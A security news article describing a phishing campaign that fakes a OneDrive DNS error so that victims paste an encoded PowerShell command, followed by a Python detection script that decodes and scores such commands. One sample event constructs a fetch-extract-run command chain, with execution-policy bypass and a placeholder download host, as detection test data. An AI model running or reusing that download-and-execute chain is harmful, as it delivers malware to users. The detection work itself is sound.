In an emerging and sophisticated phishing campaign identified by the Trellix Advanced Research Center, Microsoft OneDrive users are facing a new wave of cyber threats. This campaign employs social engineering tactics to deceive victims into executing malicious PowerShell scripts through a cleverly devised mechanism.
The scheme begins with a seemingly innocuous email that contains a malicious HTML file. Once opened, the file presents a convincing OneDrive interface, complete with a fabricated error message that falsely claims a DNS issue is obstructing file access. Users are urged to click on a “How to fix” button, which, unbeknownst to them, initiates a hidden script that quietly copies a malicious command to their clipboard.
What follows is a deceptive instruction set that leads users to open PowerShell, paste the copied command, and execute it. This command, which is partly encoded in Base64 format, performs a series of actions: it clears the DNS cache, creates a “downloads” folder on the C: drive, fetches a disguised malware archive, extracts its contents, and executes a script using AutoIt3.exe. Upon completion, a message misleadingly informs users that “the operation completed successfully, please reload the page.”
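The chain above leaves a distinctive footprint in process-creation telemetry: a PowerShell process launched from the user's desktop session with a Base64-encoded command that, once decoded, flushes the DNS cache, stages a C:\downloads folder, fetches and extracts an archive, and launches AutoIt3.exe. The following Python is an added detection example written for this article, not code from Trellix or from the campaign; it decodes `-EncodedCommand` payloads (PowerShell encodes them as UTF-16LE before Base64) and scores each command line against the stages the article lists. The indicator regexes, the scoring thresholds and the sample events are my assumptions, and the sample "chain" event uses a placeholder host rather than any real URL.

```python
import base64
import re

# Indicator patterns derived from the stages described in the article:
# DNS cache flush, a new C:\downloads folder, an archive fetch and
# extraction, and an AutoIt3.exe launch. The regexes are assumptions
# made for this example, not published Trellix detection content.
INDICATORS = {
    "dns_flush": re.compile(r"flushdns|Clear-DnsClientCache", re.I),
    "downloads_dir": re.compile(r"C:\\downloads\b", re.I),
    "fetch": re.compile(r"Invoke-WebRequest|\biwr\b|DownloadFile|\bcurl\b|\bwget\b", re.I),
    "extract": re.compile(r"Expand-Archive|ExtractToDirectory", re.I),
    "autoit": re.compile(r"AutoIt3(?:\.exe)?\b", re.I),
}

# Matches -e / -ec / -enc / -EncodedCommand followed by a Base64 token.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand payload, or None.

    PowerShell expects the token to be Base64 of UTF-16LE text; anything
    that does not decode that way is treated as 'not encoded'."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command_line(cmdline):
    """Score one process command line against the campaign indicators.

    The decoded payload (if any) is appended to the raw command line so
    that stages hidden behind Base64 are still matched."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else f"{cmdline}\n{decoded}"
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # Three or more stages of the chain in a single command line is far
    # outside normal administrative use; a lone flushdns is routine
    # troubleshooting, and an encoded command with one stage earns a look.
    if len(hits) >= 3:
        verdict = "clickfix_chain"
    elif hits and decoded is not None:
        verdict = "review"
    else:
        verdict = "benign"
    return {"encoded": decoded is not None, "hits": hits, "verdict": verdict}


def scan_events(events):
    """Return [(event_id, result)] for events whose verdict is not benign.

    Each event is a dict with 'id', 'parent' and 'cmdline' keys."""
    flagged = []
    for ev in events:
        result = analyze_command_line(ev["cmdline"])
        if result["verdict"] != "benign":
            flagged.append((ev["id"], result))
    return flagged


def _encode(ps_text):
    """Build a -EncodedCommand token the way PowerShell expects (UTF-16LE)."""
    return base64.b64encode(ps_text.encode("utf-16-le")).decode("ascii")


# Constructed sample process-creation events (not real telemetry). Event 1
# mirrors the stages the article lists with a placeholder host standing in
# for the download location; the others are benign lookalikes.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -ep bypass -enc " + _encode(
         r"ipconfig /flushdns; mkdir C:\downloads; "
         r"Invoke-WebRequest https://placeholder.invalid/a.zip -OutFile C:\downloads\a.zip; "
         r"Expand-Archive C:\downloads\a.zip C:\downloads; "
         r"C:\downloads\AutoIt3.exe C:\downloads\script.a3x")},
    {"id": 2, "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "ipconfig /flushdns"},  # routine admin troubleshooting
    {"id": 3, "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -EncodedCommand " + _encode("Get-Date")},
    {"id": 4, "parent": r"C:\Windows\System32\services.exe",
     "cmdline": "powershell.exe -enc " + _encode(r"Expand-Archive C:\temp\pkg.zip C:\temp")},
]

if __name__ == "__main__":
    for event_id, result in scan_events(SAMPLE_EVENTS):
        print(event_id, result["verdict"], result["hits"])
```

The scoring deliberately separates a single matched stage from the full chain: flushing DNS or expanding an archive on its own is everyday administration, so alerting on any one indicator would drown the SOC in noise, while three or more stages in one pasted command line is the signature of a user executing a clipboard-delivered script. In a real deployment the parent-process field is worth a second rule (PowerShell with an encoded command spawned directly from explorer.exe is exactly what a victim pasting into a freshly opened console looks like), and the decoded text should be kept with the alert so an analyst can read the command without re-decoding it.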
This phishing campaign predominantly leverages user trust and a sense of urgency, showcasing how attackers exploit psychological factors alongside technical tactics. The use of HTML files, embedded JavaScript, and the mimicry of legitimate error messages illustrates the lengths to which deceitful actors will go in their attempts to breach security.
The reach of this campaign is global, with potential ramifications including data breaches, financial loss, and reputational harm for both individuals and businesses. It underscores the critical need for ongoing vigilance and comprehensive security education within enterprises to shield against such increasingly sophisticated threats. By fostering awareness and reinforcing cybersecurity measures, organizations can better defend themselves against the threat posed by these cunning phishing attacks, safeguarding their sensitive information and ensuring operational integrity.